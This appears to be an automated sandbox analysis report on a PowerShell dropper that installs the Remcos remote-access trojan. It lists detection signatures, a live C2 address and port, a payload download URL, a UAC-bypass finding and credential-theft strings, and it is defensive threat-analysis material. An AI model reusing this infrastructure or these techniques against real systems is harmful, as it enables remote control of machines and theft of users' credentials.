Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3648, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kent.ps1", ProcessId: 6520, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 8E 29 FA 00 8D 45 A1 C3 7B 52 D1 6E AA 2C 16 8F 42 C2 19 AE E1 FD EB CF 73 00 50 FC CA 76 E2 D1 71 B4 FA BF 00 9F F2 26 D6 32 C7 14 0A CC CF 34 F7 C0 4F EE CF 8C 6C CF 23 AD 9C 30 B8 CB 7C 4B F3 BC 24 0B 09 1F 02 DD A6 19 41 02 13 81 DA CA 89 F4 C8 CF D7 1D DC AE 99 A9 04 7D 3E 67 26 C4 F3 35 85 DC C7 51 A5 6F FA 0C 00 3B C4 FE D0 56 DA B3 D6 74 C5 E0 D8 ED 2D 82 28 ED AA 9B 0A 3C 3A 8F AF F3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe, ProcessId: 6904, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-U6XQL5\exepath

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:05:54.492389+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49685	196.251.69.63	2721	TCP
2025-03-14T11:05:55.742290+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49687	196.251.69.63	2721	TCP
2025-03-14T11:05:55.773499+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.6	49686	196.251.69.63	2721	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T11:05:56.704953+0100	2803304	3	Unknown Traffic	192.168.2.6	49688	178.237.33.50	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://176.65.144.3/dev/kent.exe

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Avira: detection malicious, Label: TR/Injector.brfgl

Found malware configuration

Source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["196.251.69.63:2721:1"], "Assigned name": "Brazil", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-U6XQL5", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: kent.ps1	Virustotal: Detection: 20%			Perma Link
Source: kent.ps1	ReversingLabs: Detection: 18%

Yara detected Remcos RAT

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3959743316.0000000001558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

6_2_00433B64

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_72498f6c-d

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.48395d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3958491790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004839000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1530109872.0000000004759000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 6904, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00406ABC _wcslen,CoGetObject,

6_2_00406ABC

Source:	Binary string: CXZfASD.pdbTFnF source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000000.1506079336.0000000000C52000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: CXZfASD.pdb source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000000.1506079336.0000000000C52000.00000002.00000001.01000000.0000000A.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	6_2_004090DC
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	6_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	6_2_0041C7E5
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	6_2_0040B8BA
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_0044E989 FindFirstFileExA,	6_2_0044E989
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	6_2_00408CDE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	6_2_00419CEE
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	6_2_00407EDD
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_00406F13 FindFirstFileW,FindNextFileW,	6_2_00406F13
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_04AE10F1
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_04AE6580 FindFirstFileExA,	6_2_04AE6580
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10005B50 FindFirstFileW,FindNextFileW,FindNextFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	6_2_10005B50
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10007E40 Sleep,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	6_2_10007E40
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10019083 FindFirstFileExA,	6_2_10019083
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Code function: 6_2_10007510 FindFirstFileW,FindNextFileW,CreateFileW,FindNextFileW,FindClose,CloseHandle,FindClose,	6_2_10007510
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

6_2_00407357

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 4x nop then jmp 014852C8h

4_2_01485188

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 37MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49687 -> 196.251.69.63:2721
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49686 -> 196.251.69.63:2721
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49685 -> 196.251.69.63:2721

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 196.251.69.63

Source: global traffic

TCP traffic: 192.168.2.6:49685 -> 196.251.69.63:2721

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 10:05:52 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 13 Mar 2025 06:57:55 GMTETag: "79c00-63033d761b108"Accept-Ranges: bytesContent-Length: 498688Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 6a c8 65 08 0b a6 36 08 0b a6 36 08 0b a6 36 bc 97 57 36 1b 0b a6 36 bc 97 55 36 a3 0b a6 36 bc 97 54 36 16 0b a6 36 01 73 22 36 09 0b a6 36 96 ab 61 36 0a 0b a6 36 5a 63 a3 37 36 0b a6 36 5a 63 a2 37 29 0b a6 36 5a 63 a5 37 12 0b a6 36 01 73 35 36 13 0b a6 36 08 0b a7 36 4f 0a a6 36 a5 62 af 37 6c 0b a6 36 a5 62 59 36 09 0b a6 36 a5 62 a4 37 09 0b a6 36 52 69 63 68 08 0b a6 36 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 2b 43 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 10 00 72 05 00 00 26 02 00 00 00 00 00 64 4d 03 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 08 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 01 07 00 04 01 00 00 00 80 07 00 80 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 07 00 ac 3c 00 00 70 e6 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 e7 06 00 18 00 00 00 a8 e6 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 05 00 fc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5b 71 05 00 00 10 00 00 00 72 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 8c 01 00 00 90 05 00 00 8e 01 00 00 76 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 5e 00 00 00 20 07 00 00 0e 00 00 00 04 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 4a 00 00 00 80 07 00 00 4c 00 00 00 12 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3c 00 00 00 d0 07 00 00 3e 00 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /dev/kent.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Source: Joe Sandbox View

ASN Name: Web4AfricaZA Web4AfricaZA

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49688 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknown	TCP traffic detected without corresponding DNS query: 176.65.144.3

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe

Code function: 6_2_00427321 recv,

6_2_00427321

Source: global traffic	HTTP traffic detected: GET /crx/blobs/Ad_brx3PMR7YziqUHWUd9Aoisl-XiA2mVhBxonBR7vVg9-aWDJe8U10oul-o9rHz94bax4XYEDx4GFDnPrOf6wNeaxiIrsCpm9JkhGjpBxp3A41ZclHsUrMgMX7_usY-fuHjAMZSmuUbzRBVG-37MCQJS78AvozLrZ6uzg/EFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ_25_3_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dev/kent.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961045514.00000000049C0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1601166608.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000006.00000002.3961571362.0000000004AB0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1564678759.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: recover.exe, 00000009.00000002.1603164636.0000000003309000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1600982950.0000000003309000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://lo equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1529434160.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1529434160.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1529434160.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3/dev/kent.exe
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 00000004.00000002.1529434160.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://176.65.144.3/dev/kent.exeP
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 00000000.00000002.1521461095.0000000006E43000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1524330961.0000000007D20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvB707.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
